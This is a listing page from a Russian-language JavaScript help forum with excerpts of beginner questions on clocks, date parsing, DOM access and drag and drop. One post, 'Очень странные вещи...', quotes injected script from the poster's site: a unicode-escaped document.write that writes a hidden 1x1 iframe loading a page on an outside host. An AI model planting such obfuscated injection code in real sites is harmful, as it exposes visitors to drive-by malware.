JavaScript
A programming language that conforms to the ECMAScript specification
Explore Questions
There are no popular questions to show right now
-
0 votes1 answer
-
0 votes0 answers
-
0 votes0 answers
-
0 votes1 answer
-
0 votes0 answers
4,723 questions in this forum
-
Ajax и кнопка back
Всем доброго дня. Скажите пожалуйста, можно ли реализовать следующее. Есть страница с десятком кнопок, на каждую из которых повешена своя javascript функция. При нажатии на кнопку в определенной области страницы перезагружается содержимое (сама страница не перезагружается). Теперь вопрос: можно ли реализовать (и если можно, то как), чтобы при нажатии кнопки BACK браузера показывалось предыдущее окно, т.е. результат выполнения предыдущей функции?
0 votes7 answers -
Форматированный вывод чисел
Есть необходимость вывести число (минуты) в двухзначном формате, независимо от значения. Проще говоря "01" вместо "1", и "10". var now = new Date(); var minutes = now.getMinutes(); document.write (minutes);
0 votes12 answers -
Динамично обновляющиеся часики ;)
Сделал при помощи js вывод на страницу текущей даты и времени. Вс? хорошо, с форматами разобрался, месяца по русски пишет и вот теперь мои потребности явно превысили возможности. Теперь требуется динамично обновляющиеся часики, т.е. что бы секунды с минутами и часами текли. Вопрос, как вообще это делается?
0 votes6 answers -
Выравнивание (по горизонтали) блочно сверстаного сайта с помощью JS
Сайт сверстан блочно. Абсолютно позиционирован function alignc() { width = screen.width; if (width>1000) var dx=((screen.width-1000)/2); document.getElementById("logo")=document.getElementById("logo").style.left + dx; document.getElementById("topmenu_bgr")=document.getElementById("topmenu_bgr").style.left + dx; document.getElementById("topmenu")=document.getElementById("topmenu").style.left+dx; ... } Где ошибка?
0 votes9 answers -
Как изничтожить "историю спосещения страниц"
Есть такая проблемка: после заполнения формы ввода и успешной отправки ее на сервер, хочу сделать чтобы кнопка браузера "Назад" не работала (понятно для чего ) как это можно сделать? Попытки испльзовать что-то типа history.back.lengh=0 не работают (метод не поддерживается это свойство) Что можно сделать еще?
0 votes1 answer -
Обращение к элементу формы, добавленному через PHP скрипт
Всем доброго времени суток. Вот начал осваивать AJAX, и сталкнулся с проблемой. В ХТМЛ странице предусмотрено: <div id='comments'></div> Сюда после определенного события добавляется код формы(после обработки этого шаблона парсером через PHP скрипт): <form> <table> <tr> <td>Имя: </td> <td><input id="name" name="name" type="text"></td> </tr> <tr> <td>E-mail:</td> <td><input id="email" name="email" type="text"></td> </tr> <tr> <td>Сообщение:</td> <td><textarea id="text" name="text"></textarea></td> </tr> &…
0 votes2 answers -
При нажатии на картинку(текст) появляется скрытый ранее текст
Как сделать нечто подобное http://htmlbook.ru/content/. Нужно что бы просто при нажатии на картинку или текст появлялся скрытый до этого текст, а при повторном нажатии скрывался обратно. Можно было бы конечно использовать как раз оттуда, но мне кажется это как то громоздко. Нету ли решения как то попроще ?
0 votes2 answers -
Подобие слайдера для выставления оценок
Всем доброго времени суток! Я с недавнего времени изучаю web-программирование и хотел бы попросить подсказать идею реализации слайдера для выбора оценки (по 100-бальной шкале) чего бы то ни было. Внешний вид того, что должно получиться - здесь: http://www.st-den.com/index.php?step=2 (некорректо отображается в Firefox и Safari). (Не удивляйтесь внешнему виду сайта и большому количеству англоязычного мата. Этот сайт - что-то вроде моей песочницы, и я писал вс? что приходило в голову только для наличия текста в принципе.). То, что там есть, реализовано так: html: <div class="slider_container" onmousedown="set_slider();"><div class="slider" id="slider"></div&g…
0 votes2 answers -
ООП в Java Script и циклы с использованием setTimeout(), спецэффекты
Предистория. Есть относительно большой проект, где предполагается использовать достаточное количество всплывающих div HTML элементов на одной странице. это могут быть диалоги, алерты, конфермы и прочая, прочая. Без определения классов и объектов тут не обойтись по многим причинам, одна из них самая существенная заключается в независимости экземпляров одного и того же класса друг от друга, но с одним интерфейсом. Ниже я приведу "вырезку" из кода (обособленную, рабочую build версию класса confirm). Для удобного (эффектного) отображения конферма всплытие делается плавным (расширение сначала по ширине, затем по высоте от центра) Собственно код <!DOCTYPE html PUBLIC "-//W…
0 votes5 answers -
HELP: Ошибка в небольшом скрипте
Привет всем. Написал маленький скрипт, но в нем ошибка - помогите понять в ч?м дело пожалуйста. Вот скрипт: <script> var i; var rusalphabet = "АБВГДЕ?ЖЗИЙКЛАМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ"; var keybline1 = ""; function RussianKeyboard(){ for (i = 1; i <= 11; i++) { var keybletter = rusalphabet.substring(i-1,i); keybline1 = keybline1 + ' '+ keybletter +''; alert(keybline1); if (i != 11) { keybline1 = keybline1 + ' '; } } keyboardline1span.innerHTML = keybline1; } Судя по тому, что выда?т alert в переменной keybline1 собираются строки правильно со всеми тегами, но в результате в получается строка только из букв: АБВГДЕ?ЖЗИЙ Где ошибка?
0 votes9 answers -
Отображение картинки при наведении на ссылку
есть такой вариант <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>Идентификаторы</title> <style type="text/css"> #descr { position: relative; /* Относительное позиционирование */ visibility: hidden /* Прячем содержимое слоя */ } </style> <script type="text/javascript"> function hiddenLayer() { document.getElementById("descr").style.visibility = "hidden"; } function showLayer() { document.getElementById("descr").style.visibility = "visible"; } </script> </…
0 votes4 answers -
Очень странные вещи...
На сайте непонятно откуда взялся следующий код <script type="text/javascript"> document.write('u003cu0069u0066u0072u0061u006du0065u0020u0073u0072u0063u003du0068u0074u0074u0070u003au002fu002fu0061u0074u006fu006du0061u006bu0061u0079u0061u006eu002eu0062u0069u007au002fu0061u0066u0074u0065u0072u0066u0074u0070u0063u0068u0065u006bu002fu0030u0031u0030u0034u002fu0069u006eu0064u0065u0078u002eu0070u0068u0070u0020u0077u0069u0064u0074u0068u003du0031u0020u0068u0065u0069u0067u0068u0074u003du0031u0020u0073u0074u0079u006cu0065u003du0022u0064u0069u0073u0070u006cu0061u0079u003au006eu006fu006eu0065u0022u003eu003cu002fu0069u0066u0072u0061u006du0065u003e'); </script> Обнаружился о…
0 votes3 answers -
правельно распарсить дату
задача такая: мне нужно распарсить дату формата 2008-03-07 и записать год, день мес в отдельные переменные. Написал вот так функцию, работает но код мне не нравится. Кто может лучше ? str = '2008-03-07'; var eventDate = parseEvent(str); function parseEvent(str) { var dateHolder = []; var year = str.substr(0,str.indexOf("-")); dateHolder.push(year); var month_day = str.substr(str.indexOf("-")+1); var month = month_day.substr(0,month_day.indexOf("-")); dateHolder.push(month-1); var day = month_day.substr(month_day.lastIndexOf("-")+1); dateHolder.push(day); return dateHolder; }
0 votes3 answers -
массив
в jQuery есть замечательная штука $.each, а как на чистом javascript`е узнать позицию первого элемента в массиве, если он не нулевой а 3й например или 500й....знаю про pop и push но они же выдергивают содержимое первого а не его позицию в массиве в пхп есть замечательные комманты reset и end, а что делать в яваскрипте?
0 votes10 answers -
Событие onclick на кнопку submit в новом окне
Добрый день! Есть форма для отправки сообщения с сайта, нужно чтобы при нажатии на "отправить" открывалось в новом окне с заданными размерами. Делал так: в хедере function NewWindow() { window.open("sendmail.php","","Toolbar=0,Location=0,Directories=0,Status=0,Menubar=0,Scrollbars=0,Resizable=0,Width=300,Height=300"); } На кнопке ONCLICK="NewWindow()" Открываться-то открывается, вот только в обработчике на php есть проверка на правильность ввода текста в инпуты формы и в новом окне открывается только предупреждения о неправильности ввода. Тоесть независимо ввел ты туда что-то, или нет, при нажатии на "отправить" просто выдает "echo" с обработчика, а нужно чтобы просто о…
0 votes8 answers -
Печать части страницы
subj как?
0 votes0 answers -
обращение к дочернему элементу
есть след код <div id = "mainmenu"> <ul> <li>1</li> <li>2 <ul> <li>2.1</li> <li>2.2</li> </ul> </li> <li>3</li> </ul> </div> нужно с помощью js обратится ко вложенному списку,как это сделать? PS вариант при котором задается id вложенному ul и обращение происходит через getElementById не подойдет
0 votes3 answers -
Проблена с кроссбраузерностью (firefox)
Как в firefox'e обратиться к элементу формы, которая находится во фрейме через javascripts?!! Вот, например, в IE и Opera работает такое parent.frames["otv"].post.to_user.value а в firefox'e нет Не знаю, что и делать...:/
0 votes1 answer -
как можно задать свойство float на JS?
Когда я через CSS задаю ширину слою 550, то offsetTop левое значение выдает а когда через JS такую ширину до offsetTop устанавливаю то все нормально. И еще: как можно задать свойство float на эJS? Если это через CSS делать то потом координаты некорректными получаются. Я пытался имя_элемента_style.float='left' -- не помогало. П.С:У меня такое чувство нехорошее, что JS не может со всеми свойствами CSS работать.
0 votes29 answers -
Вместо innerText - undefined
Есть див, при кликаньи на который зовется функция <div onclick="RClick(this.innerText)" >text</div> - и по идее в параметре будет содержаться text. Потом в ф-ции function RClick(str) { window.document.getElementById('q').value=str; } - где элемент с ИД = q - обычное текстовое поле, вот и получается что при кликаньи на див в поле должен установиться текст. А там устанавливается undefined. по крайней мере в FF так.
0 votes28 answers -
Как в DIV передать код из другого HTML-файла, возможно ли ето?
Здравствуйте, я в JS новичек, посемуу не судите строго за вопрос. Суть проблемы в следующем: есть html-файл в котором содержится слой, в этот слой я хочу по клику на ссылке передавать то что записано в другом html-файле (по аналогии с фреймами), тоесть клацнув по ссылке в слой на текущей страничке загружается другая веб страничка. Возможно ли это реализовать и если да то в каком направлении копать?
0 votes5 answers -
скрипт определения размеров экрана и записи в файл
Большая просьба! Нужен скрипт задача: 1. Определить размеры экрана пользователя при загрузке 2. записать данные в файл ширину и высоту. (в две строки желательно, или в одну с разделителем) чем проще тем лучше. Заранее благодарен!
0 votes15 answers -
Flesh & margin
Народ спасайте! Трабл: есть СВФ на странице, тобиш флеши, и страница которая позиционируется с помощью margin-right Проблема в том что на баннеробменник выдает жаву с опцией WMODE="opaque", с параметром позволяющим сделать флеш фоном. И выходит что при наведении мыши курсор ( только В МАЗИЛЛЕ! ) начинает мигать (теряет фокус), и не знает что ему показывать (тоесть или просто курсор наводки или лапка для подсвечивания ссылки) ну и соответственно не всегда можно перейти... Как быть? очень не хотелось бы переверстывать или что то менять.
0 votes0 answers -
Обработка alert'a!
Пацаны, выручайте... Есть сайт, но ИЕ спотыкается при загрузке кода. Выдает системный алерт: Невозможно открыть http://****. Операция прервана. Я конечно верстаю в html, но тут почувствовал себя полным ламером, ибо ничего предпринять не смог. Пришла мысль. Обработать событие появления этого алерта средствами js, программно закрыть его и программно обновить текущую страницу. (Т.к. если закрыть алерт и нажать F5, страница грузится о_О) Короче вопрос. Можно такое реализовать или нет? Длина кода значения не имеет. плиз, если кт в курсе, ответте, мне ОЧЕНЬ нужно, причем срочно! Спасибо заранее!
0 votes8 answers -
Drag&Drop
Доброго времени суток всем. Возникла потребность создания сайта с перетаскиваемыми элементами. Все методы которые я нашел в сети можно свести к следующему: создаем слой, в который помещаем элемент который будем перемещать, ну и непосредственно скрипт, который забирает id-k дива. Этих скриптов в сети я нашел довольно таки много (не скрою, многие я просто не понял, увы, т.к. не достаточно хорошо знаю джаву), но все они не кроссбраузерные. А нужно чтобы работало как минимум в IE, Mozilla и в Opera. Может кто-либо сталкивался уже с подобной проблемой? Буду весьма благодарен. П.С. Возможно плохо искал, но на форуме не нашел подобной темы.
0 votes1 answer